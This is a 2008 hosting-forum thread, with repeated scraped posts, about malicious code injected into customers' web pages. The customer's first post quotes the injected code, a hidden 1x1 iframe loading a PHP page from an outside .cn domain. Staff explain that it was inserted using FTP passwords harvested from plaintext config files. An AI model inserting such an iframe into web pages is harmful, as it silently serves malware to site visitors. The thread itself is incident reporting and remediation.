JS code insertion - unsecure server?

macdocuk · February 2nd, 2008, 1:26 PM

Hi, a number of users reported trojan detected on their pages. I found that this code was in common:

iframe src='http://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;' /iframe

Also found out that this is inserted into pages on pass39 using "JS code rootkit" against which is apparently server unsecured.

Can admins please investigate into this and if pass39 can be secured in the future to prevent JS code insertion/hack ?

**Charlie S.** · February 2nd, 2008, 5:01 PM

Would you mind posting some example URLs which contain the infected code? I am performing a security audit on this server. I have found a few examples where an ftp account was compromised and used to upload scripts, but there is no indication of a rootkit that I have found. Alternatively, you can open a ticket with the Abuse and Security Department.

macdocuk · February 4th, 2008, 7:17 AM

Hi, I have manualy removed the code from users pages who reported this, at the moment there is none, that i am aware of, which contains that code.

Previos 2-3 users who had the same or similar code inserted into their pages were all different ie. some were php run sites (like Joomla and phpNuke) some with simple html files that had this code.

First I blamed it on Joomla's vulnerabilities, but last one was simple HTML page with .htm extension, created with MS Frontpage.

Info on this "JS code insertion" I found on web, and they mentioned "JS code rootkit" is used for this. Or it may be some other way, only I have no idea.

I will open support ticket next time and submit infected URL.

**Charlie S.** · February 4th, 2008, 10:09 AM

Be sure and change the ftp passwords for the affected accounts. Generally speaking with this type of attack, an attacker will harvest an ftp password by searching accounts for passwords stored in plaintext (such as php MySQL database configuration files). They will then use these passwords to insert malicious javascript into an account's code.

February 2nd, 2008, 1:26 PM	#1 (permalink)
macdocuk Registered User Comfy Contributor Joined in Oct 2004 107 posts Gave thanks: 5 Thanked 2 times	JS code insertion - unsecure server? Hi, a number of users reported trojan detected on their pages. I found that this code was in common: iframe src='http://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;' /iframe Also found out that this is inserted into pages on pass39 using "JS code rootkit" against which is apparently server unsecured. Can admins please investigate into this and if pass39 can be secured in the future to prevent JS code insertion/hack ? __________________ PASS 39

February 4th, 2008, 7:17 AM	#3 (permalink)
macdocuk Registered User Comfy Contributor Joined in Oct 2004 107 posts Gave thanks: 5 Thanked 2 times	Hi, I have manualy removed the code from users pages who reported this, at the moment there is none, that i am aware of, which contains that code. Previos 2-3 users who had the same or similar code inserted into their pages were all different ie. some were php run sites (like Joomla and phpNuke) some with simple html files that had this code. First I blamed it on Joomla's vulnerabilities, but last one was simple HTML page with .htm extension, created with MS Frontpage. Info on this "JS code insertion" I found on web, and they mentioned "JS code rootkit" is used for this. Or it may be some other way, only I have no idea. I will open support ticket next time and submit infected URL. __________________ PASS 39

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search

February 2nd, 2008, 5:01 PM	#2 (permalink)
Charlie S. Surpass Staff Fresh Surpasser Joined in Dec 2007 5 posts Gave thanks: 0 Thanked 1 Time in 1 Post	Would you mind posting some example URLs which contain the infected code? I am performing a security audit on this server. I have found a few examples where an ftp account was compromised and used to upload scripts, but there is no indication of a rootkit that I have found. Alternatively, you can open a ticket with the Abuse and Security Department.

February 4th, 2008, 10:09 AM	#4 (permalink)
Charlie S. Surpass Staff Fresh Surpasser Joined in Dec 2007 5 posts Gave thanks: 0 Thanked 1 Time in 1 Post	Be sure and change the ftp passwords for the affected accounts. Generally speaking with this type of attack, an attacker will harvest an ftp password by searching accounts for passwords stored in plaintext (such as php MySQL database configuration files). They will then use these passwords to insert malicious javascript into an account's code.

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)